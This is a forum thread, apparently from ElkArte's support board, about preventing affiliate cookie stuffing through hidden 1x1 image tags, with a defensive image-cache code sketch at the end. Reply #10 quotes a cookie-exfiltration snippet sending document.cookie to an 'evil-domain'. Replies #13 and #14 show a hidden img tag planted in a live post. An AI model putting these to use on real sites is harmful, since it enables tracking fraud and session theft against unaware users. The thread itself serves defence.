Topic: Cookie Stuffing - how to avoid it. (Read 6346 times) - Topic derived from ILA in message previews is (s...

Cookie Stuffing - how to avoid it.

How can we prevent users from posting 1x1 pixel wide http links instead of images,
so that they are not cookie stuffing the forum?

Cookie Stuffing works this way: normal http links are posted inside an image tag,
so the browser calls up this link and fetches the cookie from the destination site.
No image is displayed, and thus they make it only 1 x 1 pixel big, so that it does not
look suspicious...

How can this be stopped, also in the [img] tag and in avatars loaded from external sites?
Many thanks.

Re: something

Reply #1

How can we avoid that users hijack each and every topic?
Bugs creator.
Features destroyer.
Template killer.

Re: Cookie Stuffing - how to avoid it.

Reply #2

Never :( but .. 2FA login/register helps a little bit ;)

Fel

Many are stubborn in relation to the path, a few in relation to the target.
Visit our new Forum Project on https://www.portamx.com

Re: Cookie Stuffing - how to avoid it.

Reply #3

Quote from: hartiberlin – Cookie Stuffing works this way, that normal http links are posted inside an Image tag ...
Step 1 .. use https
Step 2 .. set cookies to secure and https
Step 3 .. use 2FA login / register

That will help a little bit ;)

Re: Cookie Stuffing - how to avoid it.

Reply #4

Hmm, how can the 2 Factor Authentication stop this?
This is only for the login of the member, but he could still be posting
http links inside an image [img] tag, right?

Re: Cookie Stuffing - how to avoid it.

Reply #5

I may be terribly wrong, but as far as I know, unless there is a bug in the browser, an embedded image cannot sniff the cookies because they reside on two different domains and cookies are domain specific.
You need at least to be able to run javascript to sniff the session data; embedded images are generally not enough from what I know.

Re: Cookie Stuffing - how to avoid it.

Reply #6

Also you can disable images in the posts .. (simply disable the BBC img tag in the settings).
If a user wants to add an image, he can upload it and insert it as an attachment. So this image is stored locally.

Re: Cookie Stuffing - how to avoid it.

Reply #7

Quote from: hartiberlin – Hmm, how does the 2 Factor Authentication can stop this ?
That does not stop any criminal activity .. but .. I think that such users do not have an account with which they can handle 2FA ;)

Re: Cookie Stuffing - how to avoid it.

Reply #9

You mean a way to mitigate a problem that doesn't exist, or you mean the cache proxy could be exploited to send cookie data back?

Re: Cookie Stuffing - how to avoid it.

Reply #10

Cookies can only be set and read on the domain the browser retrieves data from. The OP is clearly talking about preventing third-party tracking cookies (hence "stuffing," not "sniffing"), which as a problem is perfectly possible in a regular bog-standard HTTP environment. I hadn't encountered the specific term before, but Wikipedia explains it thus:

Quote: On the World Wide Web, cookie stuffing (also cookie dropping) is an affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target.

I don't know if this is actually something to worry about, but all you have to do to test it is to copy the php setcookie() example into a PHP file, stick <img src="the-different-domain-with-setcookie.php"> in an HTML file, load it, and check if the cookie exists on the-different-domain. Unless you've disabled third-party cookies, it will.

You're talking about something like XSS session hijacking, which is completely unrelated except in the sense that you could use image.src = evil-domain + document.cookie in a script to do it. To prevent that in case of script injection, use HttpOnly, preferably combined with HTTPS. But like I said, that's off topic. This is about tracking cookies.

Edit:
Quoting what I wrote above:
Quote: Unless you've disabled third-party cookies, it will.
Of course you'll need to add an image mimetype and some image data if you want to display an actual 1x1 px image as opposed to a nice broken image icon. Presumably a transparent GIF would be your best bet. My point was that you can perform the basic proof of concept in seconds.

Edit 2: fully worked out example here, including a full description of the problem (described as an opportunity). Of course not everything applies because our forum won't request resources other than the one specific image from the server:

Quote: Once the third-party cookie system is in place, it can be made to do something useful. For example:

When the third-party cookie is set any content can be sent to the web page with appropriate HTML tags. Image, JavaScript, Flash, HTML ads, anything that can be published on a web page. [The ad thing might apply, but in that case the actual ads would already be doing the tracking cookie job in the first place.]

The cookie setting can be logged, along with any other information available at the time, including referring web page and domain, and including any other information the HTML tag provided. [This obviously applies.]

Date and time can be recorded. Ad identification can be recorded. [Sure.]

Cookies previously set can be read and the cookie's value adjusted. [Yup.]

There are ways to work around third-party cookie restrictions some browsers make available to their users. [Not without participation from both domains.]

The limit of what can be done may be determined by the limit of what can be imagined. [Not to worry about that one; again not without participation from all domains involved.]
Last Edit: February 07, 2018, 11:14:07 am by Frenzie

Re: Cookie Stuffing - how to avoid it.

Reply #11

Quote from: Frenzie – Cookies can only be set and read on the domain the browser retrieves data from. The OP is clearly talking about preventing third-party tracking cookies (hence "stuffing," not "sniffing"), which as a problem is perfectly possible in a regular bog-standard HTTP environment. I hadn't encountered the specific term before, but Wikipedia explains it thus:

Quote: On the World Wide Web, cookie stuffing (also cookie dropping) is an affiliate marketing technique in which, as a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target.


Yes, I meant this regarding affiliate cookie stuffing, e.g. Amazon or Ebay or Clickbank cookies for instance...
Hiding them in an image tag can set them in the user's browser although he never visited Amazon for instance..
Then when he visits Amazon himself and makes a purchase, the Cookie Stuffer gets the commission for the sale...
I want to prevent this being done by users in my forum.
Many thanks.
Regards, Stefan.

Re: Cookie Stuffing - how to avoid it.

Reply #12

Sorry, I thought it was a typo.
You get pretty nasty users there.
Disable any embedding and you are safe.
Enable https and image cache and you should be safe.

Re: Cookie Stuffing - how to avoid it.

Reply #13

Well Elkarte.net is also vulnerable to cookie stuffing.

I just tested it and it went through.
See:
https://www.elkarte.net/community/index.php?topic=5272.msg37525#msg37525

Mark all the text there in this posting and right-click in Firefox
and click "Show Sourcecode of marked selection."

There you will see the img src tag with an https link just to google.de
and nobody knows that it is there...
This way you can also set Affiliate cookies without anybody knowing...
So the admins here should better deactivate this function on Elkarte.net!

Re: Cookie Stuffing - how to avoid it.

Reply #14

Code:
<img src="https://google.de" alt="" style="width: 100%; max-width: 20px; max-height: 1px; cursor: pointer;" class="bbc_img resized">


The mentioned posting
https://www.elkarte.net/community/index.php?topic=5272.msg37525#msg37525
now contains this and this way a Cookie from Google will be set into your browser...
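
The image-cache approach suggested in Reply #12, sketched as an added example (not part of the thread and not ElkArte's own code): the forum fetches each [img] URL itself, keeps it only if the response really is an image, and rewrites the post so members' browsers load it from the forum's own domain. The `/imgcache?u=` endpoint, the `fetch` callable and the sample hosts and responses are assumptions made for illustration.

```python
import re
from urllib.parse import quote

# Leading bytes of the image types this sketch lets through.
MAGIC = {
    "image/gif": (b"GIF87a", b"GIF89a"),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
}
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def check_image_response(status, headers, body):
    """Judge a response the server fetched itself, sending no cookies."""
    headers = {k.lower(): v for k, v in headers.items()}
    if status != 200:  # redirects are refused too: only direct image URLs pass
        return False, f"status {status}"
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in MAGIC:
        return False, f"content-type {ctype or 'missing'}"
    if not body.startswith(MAGIC[ctype]):
        return False, "body does not match declared image type"
    return True, "image"


def rewrite_post(bbcode, fetch, proxy_prefix="/imgcache?u="):
    """Point verified [img] URLs at the local cache; turn the rest into [url]."""
    rejected = []

    def repl(match):
        url = match.group(1).strip()
        ok, reason = check_image_response(*fetch(url))
        if ok:
            return f"[img]{proxy_prefix}{quote(url, safe='')}[/img]"
        rejected.append((url, reason))
        return f"[url]{url}[/url]"

    return IMG_TAG.sub(repl, bbcode), rejected


# Constructed responses standing in for real server-side fetches.
SAMPLE = {
    "https://pics.example/cat.gif":
        (200, {"Content-Type": "image/gif"}, b"GIF89a\x01\x00\x01\x00"),
    "https://shop.example/?ref=123":
        (200, {"Content-Type": "text/html", "Set-Cookie": "ref=123"}, b"<html>"),
}
POST = "Look: [img]https://pics.example/cat.gif[/img] [img]https://shop.example/?ref=123[/img]"
print(rewrite_post(POST, SAMPLE.__getitem__))
```

Because the member's browser only ever requests the forum's own cache URL, any Set-Cookie header sent by the remote host stops at the server and never reaches the reader.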